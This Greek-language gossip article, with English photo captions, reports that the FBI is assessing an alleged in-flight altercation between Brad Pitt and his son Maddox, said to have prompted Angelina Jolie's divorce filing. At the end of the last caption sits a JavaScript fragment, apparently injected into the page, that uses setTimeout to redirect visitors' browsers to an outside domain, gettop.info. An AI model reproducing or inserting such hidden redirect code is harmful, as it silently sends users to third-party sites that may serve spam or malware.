Εμπλοκή του FBI στο πολύκροτο διαζύγιο Τζολί – Πιτ (ΕΙΚΟΝΕΣ)

0
7

 

Νέα τροπή έχει πάρει το διαζύγιο της δεκαετίας… Καθώς σύμφωνα με σημερινά δημοσιεύματα το περιστατικό με το αεροπλάνο φτάνει μέχρι και το FBI..

The actor and his 15-year-old son were at odds for unknown reasons, but Pitt did not touch the teenager at any time claims the source (Pitt, Jolie and Maddox in 2006)

Σύμφωνα με το Sky News, η εκπρόσωπος του FBI Laura Eimiller, δήλωσε ότι ο οργανισμός αξιολογεί το γεγονός και ερευνά σε ομοσπονδιακό επίπεδο, αν ο Μπραντ Πιτ υπήρξε βίαιος απέναντι στα παιδιά του, όπως άλλωστε είπαν μάρτυρες που είδαν τον 52χρονο σταρ χρησιμοποιεί σωματική και λεκτική βία.

Jolie, Maddox and Pitt are seen on June 6, 2015, departing on a flight from Los Angeles

Το FBI έχει ακόμα ένα λόγο να επέμβει καθώς το εν λόγω γεγονός έγινε στον αέρα κατά τη διάρκεια της πτήσης από τη Γαλλία στις ΗΠΑ.

Cause: Brad Pitt's argument with son Maddox led to Angelina Jolie's decision to file for divorce (above in May 2014)

Οι υπηρεσίες πρόνοιας, σύμφωνα με νεότερα δημοσιεύματα, έχουν ήδη μιλήσει με τους μάρτυρες αλλά και με το ζεύγος Τζολί – Πιτ και ενδεχομένως θα ζητήσουν να μιλήσουν και με τα ανήλικα παιδιά τους.

Incident: Pitt is pictured climbing off a jet in 2014 with daughter Vivienne 

Με σημερινό δημοσίευμα της η Daily Mail επιμένει πως ο καβγάς έγινε και ήταν μεταξύ του Μπραντ Πιτ και του γιου του Maddox.

Divorce: TMZ reports that the alleged episode, last Wednesday, prompted Angelina Jolie (Maddox pictured disembarking a plane in 2014) to split from the 52-year-old the next day setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here